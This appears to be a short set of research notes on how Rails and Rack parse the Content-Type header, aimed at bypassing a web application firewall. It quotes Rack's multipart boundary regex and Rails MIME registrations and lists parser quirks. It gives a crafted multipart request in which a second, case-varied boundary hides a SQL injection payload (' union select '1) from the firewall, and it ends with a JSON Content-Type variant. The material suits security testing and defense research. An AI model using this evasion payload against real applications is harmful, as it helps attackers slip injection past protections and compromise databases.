Endpoint
def index
data = request.POSTSource code
/rack/rack/lib/rack/multipart.rb
MULTIPART = %r|\Amultipart/.*boundary=\"?([^\";,]+)\"?|ni/rails/rails/actionpack/lib/action_dispatch/http/mime_types.rb
Mime::Type.register "application/json", :json, %w( text/x-json application/jsonrequest )Content-Type
application/x-www-form-urlencoded,XXX
multipart/form-data,XXX
Multipart Content-Type
| Check | Value |
|---|---|
| Mime-Type | case-insensitive |
| Multiple boundary | last position |
| Boundary key | case-insensitive |
HTTP Request
POST / HTTP/1.1
Host: localhost
Content-Type: Multipart/FORM-data,XXX; boundary=wafboundary; xxxBOUNDARY=railsboundary,x=x
Content-Length: 225
--wafboundary
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain
--railsboundary
Content-Disposition: form-data; name="q"
' union select '1
--railsboundary--
--wafboundary--JSON Content-Type
application/json,XXX
text/x-json,XXX
application/jsonrequest,XXX
HTTP Request
POST / HTTP/1.1
Host: localhost
Content-Type: text/x-json
Content-Length: 13
{"test":true}